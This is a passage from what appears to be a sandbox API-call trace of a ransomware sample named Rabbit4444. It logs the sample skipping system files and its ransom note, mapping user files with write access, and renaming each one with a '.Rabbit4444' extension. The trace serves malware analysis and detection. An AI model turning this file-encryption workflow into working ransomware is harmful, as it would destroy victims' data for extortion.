BACK YOUR FILES.txt") returned -1 [0067.314] lstrcmpiW (lpString1="0.0.filtertrie.intermediate.txt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.314] lstrcmpiW (lpString1="0.0.filtertrie.intermediate.txt", lpString2="Rabbit4444.exe") returned -1 [0067.314] lstrcmpiW (lpString1="0.0.filtertrie.intermediate.txt", lpString2=".") returned 1 [0067.314] lstrcmpiW (lpString1="0.0.filtertrie.intermediate.txt", lpString2="..") returned 1 [0067.314] lstrcmpiW (lpString1="0.0.filtertrie.intermediate.txt", lpString2="windows") returned -1 [0067.315] lstrcmpiW (lpString1="0.0.filtertrie.intermediate.txt", lpString2="bootmgr") returned -1 [0067.315] lstrcmpiW (lpString1="0.0.filtertrie.intermediate.txt", lpString2="pagefile.sys") returned -1 [0067.315] lstrcmpiW (lpString1="0.0.filtertrie.intermediate.txt", lpString2="boot") returned -1 [0067.315] lstrcmpiW (lpString1="0.0.filtertrie.intermediate.txt", lpString2="ids.txt") returned -1 [0067.315] lstrcmpiW (lpString1="0.0.filtertrie.intermediate.txt", lpString2="NTUSER.DAT") returned -1 [0067.315] lstrcpyW (in: lpString1=0x130ec6c, lpString2="0.0.filtertrie.intermediate.txt" | out: lpString1="0.0.filtertrie.intermediate.txt") returned="0.0.filtertrie.intermediate.txt" [0067.315] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{26159dcd-00b6-4881-a91c-092cd378d482}\\0.0.filtertrie.intermediate.txt", dwFileAttributes=0x0) returned 1 [0067.315] lstrlenW (lpString="0.0.filtertrie.intermediate.txt") returned 31 [0067.315] lstrlenW (lpString="Rabbit4444") returned 10 [0067.315] lstrcmpiW (lpString1="ediate.txt", lpString2="Rabbit4444") returned -1 [0067.315] lstrlenW (lpString=".dll") returned 4 [0067.315] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0067.315] lstrlenW (lpString=".lnk") returned 4 [0067.315] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0067.315] lstrlenW (lpString=".ini") returned 4 [0067.315] lstrcmpiW (lpString1=".txt", lpString2=".ini") returned 1 [0067.315] lstrlenW (lpString=".sys") returned 4 [0067.315] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0067.315] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{26159dcd-00b6-4881-a91c-092cd378d482}\\0.0.filtertrie.intermediate.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\settings_{26159dcd-00b6-4881-a91c-092cd378d482}\\0.0.filtertrie.intermediate.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0067.316] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.316] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15862654272) returned 1 [0067.316] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=90303) returned 1 [0067.316] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1178d8 [0067.316] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101518 [0067.316] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x163c0, lpName=0x0) returned 0x29c [0067.317] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x163c0) returned 0x70000 [0067.321] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11dc80 [0067.321] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0067.321] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11dc80 | out: hHeap=0xe0000) returned 1 [0067.321] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0067.321] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x115390 [0067.322] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0067.322] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115390 | out: hHeap=0xe0000) returned 1 [0067.322] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0067.322] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15863238506) returned 1 [0067.322] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1178d8 | out: hHeap=0xe0000) returned 1 [0067.322] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101518 | out: hHeap=0xe0000) returned 1 [0067.322] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.323] CloseHandle (hObject=0x29c) returned 1 [0067.323] CloseHandle (hObject=0x260) returned 1 [0067.323] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{26159dcd-00b6-4881-a91c-092cd378d482}\\0.0.filtertrie.intermediate.txt.Rabbit4444") returned 196 [0067.323] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{26159dcd-00b6-4881-a91c-092cd378d482}\\0.0.filtertrie.intermediate.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\settings_{26159dcd-00b6-4881-a91c-092cd378d482}\\0.0.filtertrie.intermediate.txt"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{26159dcd-00b6-4881-a91c-092cd378d482}\\0.0.filtertrie.intermediate.txt.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\settings_{26159dcd-00b6-4881-a91c-092cd378d482}\\0.0.filtertrie.intermediate.txt.rabbit4444"), dwFlags=0x1) returned 1 [0067.324] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52e5203f, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0x52e5203f, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0x52e5203f, ftLastWriteTime.dwHighDateTime=0x1d327b4, nFileSizeHigh=0x0, nFileSizeLow=0x5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0.1.filtertrie.intermediate.txt", cAlternateFileName="01FILT~1.TXT")) returned 1 [0067.324] lstrcmpiW (lpString1="0.1.filtertrie.intermediate.txt", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.324] lstrcmpiW (lpString1="0.1.filtertrie.intermediate.txt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.324] lstrcmpiW (lpString1="0.1.filtertrie.intermediate.txt", lpString2="Rabbit4444.exe") returned -1 [0067.324] lstrcmpiW (lpString1="0.1.filtertrie.intermediate.txt", lpString2=".") returned 1 [0067.324] lstrcmpiW (lpString1="0.1.filtertrie.intermediate.txt", lpString2="..") returned 1 [0067.324] lstrcmpiW (lpString1="0.1.filtertrie.intermediate.txt", lpString2="windows") returned -1 [0067.324] lstrcmpiW (lpString1="0.1.filtertrie.intermediate.txt", lpString2="bootmgr") returned -1 [0067.324] lstrcmpiW (lpString1="0.1.filtertrie.intermediate.txt", lpString2="pagefile.sys") returned -1 [0067.324] lstrcmpiW (lpString1="0.1.filtertrie.intermediate.txt", lpString2="boot") returned -1 [0067.324] lstrcmpiW (lpString1="0.1.filtertrie.intermediate.txt", lpString2="ids.txt") returned -1 [0067.324] lstrcmpiW (lpString1="0.1.filtertrie.intermediate.txt", lpString2="NTUSER.DAT") returned -1 [0067.324] lstrcpyW (in: lpString1=0x130ec6c, lpString2="0.1.filtertrie.intermediate.txt" | out: lpString1="0.1.filtertrie.intermediate.txt") returned="0.1.filtertrie.intermediate.txt" [0067.324] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{26159dcd-00b6-4881-a91c-092cd378d482}\\0.1.filtertrie.intermediate.txt", dwFileAttributes=0x0) returned 1 [0067.325] lstrlenW (lpString="0.1.filtertrie.intermediate.txt") returned 31 [0067.325] lstrlenW (lpString="Rabbit4444") returned 10 [0067.325] lstrcmpiW (lpString1="ediate.txt", lpString2="Rabbit4444") returned -1 [0067.325] lstrlenW (lpString=".dll") returned 4 [0067.325] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0067.325] lstrlenW (lpString=".lnk") returned 4 [0067.325] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0067.325] lstrlenW (lpString=".ini") returned 4 [0067.325] lstrcmpiW (lpString1=".txt", lpString2=".ini") returned 1 [0067.325] lstrlenW (lpString=".sys") returned 4 [0067.325] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0067.325] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{26159dcd-00b6-4881-a91c-092cd378d482}\\0.1.filtertrie.intermediate.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\settings_{26159dcd-00b6-4881-a91c-092cd378d482}\\0.1.filtertrie.intermediate.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0067.325] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.325] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15863608209) returned 1 [0067.325] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=5) returned 1 [0067.325] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0067.325] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101e20 [0067.326] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x310, lpName=0x0) returned 0x29c [0067.327] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x310) returned 0x70000 [0067.328] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11dc80 [0067.328] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0067.329] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11dc80 | out: hHeap=0xe0000) returned 1 [0067.329] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0067.329] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x115390 [0067.329] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0067.329] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115390 | out: hHeap=0xe0000) returned 1 [0067.329] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0067.329] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15863973388) returned 1 [0067.329] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0067.329] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101e20 | out: hHeap=0xe0000) returned 1 [0067.329] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.329] CloseHandle (hObject=0x29c) returned 1 [0067.329] CloseHandle (hObject=0x260) returned 1 [0067.329] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{26159dcd-00b6-4881-a91c-092cd378d482}\\0.1.filtertrie.intermediate.txt.Rabbit4444") returned 196 [0067.329] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{26159dcd-00b6-4881-a91c-092cd378d482}\\0.1.filtertrie.intermediate.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\settings_{26159dcd-00b6-4881-a91c-092cd378d482}\\0.1.filtertrie.intermediate.txt"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{26159dcd-00b6-4881-a91c-092cd378d482}\\0.1.filtertrie.intermediate.txt.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\settings_{26159dcd-00b6-4881-a91c-092cd378d482}\\0.1.filtertrie.intermediate.txt.rabbit4444"), dwFlags=0x1) returned 1 [0067.330] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52e5203f, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0x52e5203f, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0x52e5203f, ftLastWriteTime.dwHighDateTime=0x1d327b4, nFileSizeHigh=0x0, nFileSizeLow=0x5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0.2.filtertrie.intermediate.txt", cAlternateFileName="02FILT~1.TXT")) returned 1 [0067.330] lstrcmpiW (lpString1="0.2.filtertrie.intermediate.txt", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.330] lstrcmpiW (lpString1="0.2.filtertrie.intermediate.txt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.330] lstrcmpiW (lpString1="0.2.filtertrie.intermediate.txt", lpString2="Rabbit4444.exe") returned -1 [0067.330] lstrcmpiW (lpString1="0.2.filtertrie.intermediate.txt", lpString2=".") returned 1 [0067.330] lstrcmpiW (lpString1="0.2.filtertrie.intermediate.txt", lpString2="..") returned 1 [0067.330] lstrcmpiW (lpString1="0.2.filtertrie.intermediate.txt", lpString2="windows") returned -1 [0067.330] lstrcmpiW (lpString1="0.2.filtertrie.intermediate.txt", lpString2="bootmgr") returned -1 [0067.330] lstrcmpiW (lpString1="0.2.filtertrie.intermediate.txt", lpString2="pagefile.sys") returned -1 [0067.330] lstrcmpiW (lpString1="0.2.filtertrie.intermediate.txt", lpString2="boot") returned -1 [0067.331] lstrcmpiW (lpString1="0.2.filtertrie.intermediate.txt", lpString2="ids.txt") returned -1 [0067.331] lstrcmpiW (lpString1="0.2.filtertrie.intermediate.txt", lpString2="NTUSER.DAT") returned -1 [0067.331] lstrcpyW (in: lpString1=0x130ec6c, lpString2="0.2.filtertrie.intermediate.txt" | out: lpString1="0.2.filtertrie.intermediate.txt") returned="0.2.filtertrie.intermediate.txt" [0067.331] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{26159dcd-00b6-4881-a91c-092cd378d482}\\0.2.filtertrie.intermediate.txt", dwFileAttributes=0x0) returned 1 [0067.331] lstrlenW (lpString="0.2.filtertrie.intermediate.txt") returned 31 [0067.331] lstrlenW (lpString="Rabbit4444") returned 10 [0067.331] lstrcmpiW (lpString1="ediate.txt", lpString2="Rabbit4444") returned -1 [0067.331] lstrlenW (lpString=".dll") returned 4 [0067.331] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0067.331] lstrlenW (lpString=".lnk") returned 4 [0067.331] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0067.331] lstrlenW (lpString=".ini") returned 4 [0067.331] lstrcmpiW (lpString1=".txt", lpString2=".ini") returned 1 [0067.331] lstrlenW (lpString=".sys") returned 4 [0067.331] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0067.331] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{26159dcd-00b6-4881-a91c-092cd378d482}\\0.2.filtertrie.intermediate.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\settings_{26159dcd-00b6-4881-a91c-092cd378d482}\\0.2.filtertrie.intermediate.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0067.331] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.332] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15864228326) returned 1 [0067.332] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=5) returned 1 [0067.332] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0067.332] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101ea8 [0067.332] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x310, lpName=0x0) returned 0x27c [0067.335] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x310) returned 0x70000 [0067.336] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11dc80 [0067.336] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0067.336] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11dc80 | out: hHeap=0xe0000) returned 1 [0067.336] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0067.336] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x115390 [0067.336] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0067.336] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115390 | out: hHeap=0xe0000) returned 1 [0067.337] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0067.337] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15864733161) returned 1 [0067.337] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0067.337] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101ea8 | out: hHeap=0xe0000) returned 1 [0067.337] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.337] CloseHandle (hObject=0x27c) returned 1 [0067.337] CloseHandle (hObject=0x260) returned 1 [0067.337] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{26159dcd-00b6-4881-a91c-092cd378d482}\\0.2.filtertrie.intermediate.txt.Rabbit4444") returned 196 [0067.337] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{26159dcd-00b6-4881-a91c-092cd378d482}\\0.2.filtertrie.intermediate.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\settings_{26159dcd-00b6-4881-a91c-092cd378d482}\\0.2.filtertrie.intermediate.txt"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{26159dcd-00b6-4881-a91c-092cd378d482}\\0.2.filtertrie.intermediate.txt.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\settings_{26159dcd-00b6-4881-a91c-092cd378d482}\\0.2.filtertrie.intermediate.txt.rabbit4444"), dwFlags=0x1) returned 1 [0067.338] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53362df6, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0x53362df6, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0x53362df6, ftLastWriteTime.dwHighDateTime=0x1d327b4, nFileSizeHigh=0x0, nFileSizeLow=0x1a35b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Settings.ft", cAlternateFileName="")) returned 1 [0067.338] lstrcmpiW (lpString1="Settings.ft", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0067.338] lstrcmpiW (lpString1="Settings.ft", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.338] lstrcmpiW (lpString1="Settings.ft", lpString2="Rabbit4444.exe") returned 1 [0067.338] lstrcmpiW (lpString1="Settings.ft", lpString2=".") returned 1 [0067.338] lstrcmpiW (lpString1="Settings.ft", lpString2="..") returned 1 [0067.338] lstrcmpiW (lpString1="Settings.ft", lpString2="windows") returned -1 [0067.338] lstrcmpiW (lpString1="Settings.ft", lpString2="bootmgr") returned 1 [0067.338] lstrcmpiW (lpString1="Settings.ft", lpString2="pagefile.sys") returned 1 [0067.338] lstrcmpiW (lpString1="Settings.ft", lpString2="boot") returned 1 [0067.338] lstrcmpiW (lpString1="Settings.ft", lpString2="ids.txt") returned 1 [0067.338] lstrcmpiW (lpString1="Settings.ft", lpString2="NTUSER.DAT") returned 1 [0067.338] lstrcpyW (in: lpString1=0x130ec6c, lpString2="Settings.ft" | out: lpString1="Settings.ft") returned="Settings.ft" [0067.338] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{26159dcd-00b6-4881-a91c-092cd378d482}\\Settings.ft", dwFileAttributes=0x0) returned 1 [0067.339] lstrlenW (lpString="Settings.ft") returned 11 [0067.339] lstrlenW (lpString="Rabbit4444") returned 10 [0067.339] lstrcmpiW (lpString1="ettings.ft", lpString2="Rabbit4444") returned -1 [0067.339] lstrlenW (lpString=".dll") returned 4 [0067.339] lstrcmpiW (lpString1="s.ft", lpString2=".dll") returned 1 [0067.339] lstrlenW (lpString=".lnk") returned 4 [0067.339] lstrcmpiW (lpString1="s.ft", lpString2=".lnk") returned 1 [0067.339] lstrlenW (lpString=".ini") returned 4 [0067.339] lstrcmpiW (lpString1="s.ft", lpString2=".ini") returned 1 [0067.339] lstrlenW (lpString=".sys") returned 4 [0067.339] lstrcmpiW (lpString1="s.ft", lpString2=".sys") returned 1 [0067.339] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{26159dcd-00b6-4881-a91c-092cd378d482}\\Settings.ft" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\settings_{26159dcd-00b6-4881-a91c-092cd378d482}\\settings.ft"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0067.339] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.339] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15865004521) returned 1 [0067.339] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=107355) returned 1 [0067.339] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0067.339] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1020c8 [0067.339] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1a660, lpName=0x0) returned 0x27c [0067.340] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1a660) returned 0x70000 [0067.345] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11dc80 [0067.345] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0067.345] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11dc80 | out: hHeap=0xe0000) returned 1 [0067.345] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0067.345] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x115390 [0067.346] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0067.346] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115390 | out: hHeap=0xe0000) returned 1 [0067.346] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0067.346] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15865660562) returned 1 [0067.346] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0067.346] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1020c8 | out: hHeap=0xe0000) returned 1 [0067.346] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.347] CloseHandle (hObject=0x27c) returned 1 [0067.347] CloseHandle (hObject=0x260) returned 1 [0067.347] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{26159dcd-00b6-4881-a91c-092cd378d482}\\Settings.ft.Rabbit4444") returned 176 [0067.347] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{26159dcd-00b6-4881-a91c-092cd378d482}\\Settings.ft" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\settings_{26159dcd-00b6-4881-a91c-092cd378d482}\\settings.ft"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{26159dcd-00b6-4881-a91c-092cd378d482}\\Settings.ft.Rabbit4444" (normalized: 